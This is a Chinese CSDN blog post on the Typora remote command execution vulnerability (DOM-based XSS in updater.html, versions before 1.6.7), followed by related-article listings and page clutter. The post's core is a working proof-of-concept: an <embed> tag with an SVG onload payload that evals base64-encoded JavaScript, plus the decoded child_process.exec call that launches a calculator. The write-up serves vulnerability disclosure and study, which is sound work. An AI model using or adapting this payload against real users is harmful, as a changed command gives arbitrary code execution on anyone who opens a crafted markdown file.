Typora DOM-Based 远程命令执行漏洞

最新推荐文章于 2024-08-27 16:58:03 发布
最新推荐文章于 2024-08-27 16:58:03 发布
阅读量586 收藏
点赞数 1
文章标签: 网络安全 typescript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/132537548
版权

漏洞简介

Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码typora://app/typemark/updater/update.html在<embed>标记中。如果用户在Typora中打开恶意降价文件,或者从恶意网页复制文本并将其粘贴到Typora,则可以利用此漏洞。

<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]"></embed>

base64加密部分

reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

在这里插入图片描述

来源:
https://starlabs.sg/advisories/23/23-2317/

yr678
关注
Typora DOM-Based远程命令执行
weixin_50815573的博客
08-29 137
Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码typora://app/typemark/updater/update.html在<embed>标记中。如果用户在Typora中打开恶意降价文件,或者从恶意网页复制文本并将其粘贴到Typora,则可以利用此漏洞。base64加密部分。
Typora-远程命令执行漏洞复现-CVE-2023-2317
apple_52661176的博客
08-31 325
Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞,具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件,来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件,或者从一个恶意网页复制文本并将其粘贴到Typora中,那么攻击者可以通过在<embed>标签中引用update.html来利用这个漏洞
Typora 远程代码执行漏洞(CVE-2023-2317)
qq_34914659的博客
08-29 728
Typora是一款编辑器。Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 3791
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
中间件寄术
weixin_46106758的博客
12-23 2204
EBU6501 Middleware TB1 1.1 MOM(Messge-Oriented Middleware) 面向消息的中间件 Messaging Messaging is a method of communication between software components or applications. A messaging system:peer to peer (P2P)点对点 Messaging enables distributed communication tha
WEB渗透之相关概念(笔记)
SXXYNHHXX的博客
07-17 939
cdn全称是内容分发网络。其目的是让用户能够更快速的得到请求的数据。简单来讲,cdn就是用来加速的,他能让用户就近访问数据,这样就更更快的获取到需要的数据。举个例子,现在服务器在北京,深圳的用户想要获取服务器上的数据就需要跨越一个很远的距离,这显然就比北京的用户访问北京的服务器速度要慢。但是现在我们在深圳建立一个cdn服务器,上面缓存住一些数据,深圳用户访问时先访问这个cdn服务器,如果服务器上有用户请求的数据就可以直接返回,这样速度就大大的提升了。
笔记,后期整理
weixin_30278237的博客
08-06 8313
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
DVWA学习笔记
lee_maple的博客
01-15 3156
DVWA学习笔记 Security Level: LOW 暴力破解(Brute Force) 已知用户名,尝试使用burp爆破密码 随意输入一个密码,将其发送至burpsuit intruder 导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解 一般情况下,不难看出长度不同的即为正确密码 命令注入(Command Injection) Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。P..
这份2021Java程序员常用技术栈和工具清单,刷爆了朋友圈...
公众号-老炮说Java
02-02 7041
点击上方蓝色字体,选择“标星公众号”优质文章,第一时间送达关注公众号后台回复pay或mall获取实战项目资料+视频作为一枚Java程序员,需要掌握哪些技术和工具才能完成一个JavaWeb...
DOM-based型XSS
weixin_44186370的博客
08-20 1573
DOM-based型XSS 这种类型的XSS并非按照“数据是否保存在服务器端”来划分,DOM Based XSS从效果上来说也是反射型XSS。单独划分出来,是因为DOM Based XSS的形成原因比较特别,发现它的安全专家专门提出了这种类型的XSS。出于历史原因,也就把它单独作为一个分类了。通过修改页面的DOM节点形成的XSS,称之为DOM Based XSS。 我们客户端的js可以对页面dom节点进行动态的操作,比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
weixin_45022281的博客
10-13 2567
Apache Solr 远程命令执行漏洞(CVE-2017-12629) 漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 风险
CVE-2023-2317:Typora 远程代码执行漏洞复现
薛定谔嘚喵博客
09-06 534
Typora是一款编辑器。Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9646
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
DVWA关卡10:DOM Based Cross Site Scripting (XSS)(DOM型XSS)
m0_54899775的博客
12-08 1227
DVWA关卡10:DOM Based Cross Site Scripting (XSS)(DOM型XSS)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vue3+el-tale封装(编辑、删除、查看详情按钮一起封装)
CallMe_CrabXie的博客
08-27 2014
对应的tableData和tableDataHeader文件(实际开发中,应该从后端拿tableData,tableHeader根据情况自定义)
家政服务管理平台 源码+数据库+论文(JAVA+SpringBoot+Vue.JS+MySQL).zip
最新发布
10-02
家政服务管理平台 源码+数据库+论文(JAVA+SpringBoot+Vue.JS+MySQL) 启动教程:https://www.bilibili.com/video/BV11ktveuE2d
基于SpringBoot和Bootstrap的Kettle 8.3任务调度系统设计源码
10-02
该项目是一款基于SpringBoot和Bootstrap框架构建的Kettle 8.3任务调度系统源码,包含675个文件,涵盖256个JavaScript文件、198个Java源文件、51个PNG图片文件、34个CSS文件、31个HTML文件、30个GIF文件、11个JPG文件、9个XML文件、7个YML文件、7个TXT文件。系统后端利用SpringBoot框架实现,前端界面采用Bootstrap设计,同时借鉴了zhaxiaodong9860的代码并进行优化,提供便捷的页面管理功能。后台代码基于Kettle 8.3 API进行工具化编写,旨在提升使用效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值